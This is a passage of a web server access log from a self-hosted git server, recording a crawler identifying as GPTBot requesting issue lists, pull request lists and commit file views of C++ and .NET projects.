AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:19:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:03:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:19:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:19:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:19:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:19:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15126] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13730] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin?display=rendered" [Client 74.7.227.38] [Length 11052] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:19:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:19:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:19:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=source" [Client 74.7.227.38] [Length 11769] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=source" [Client 74.7.227.38] [Length 11399] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" +[17/Feb/2026:19:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfo.cs" +[17/Feb/2026:19:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:04:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:04:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:04:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:04:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:19:04:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 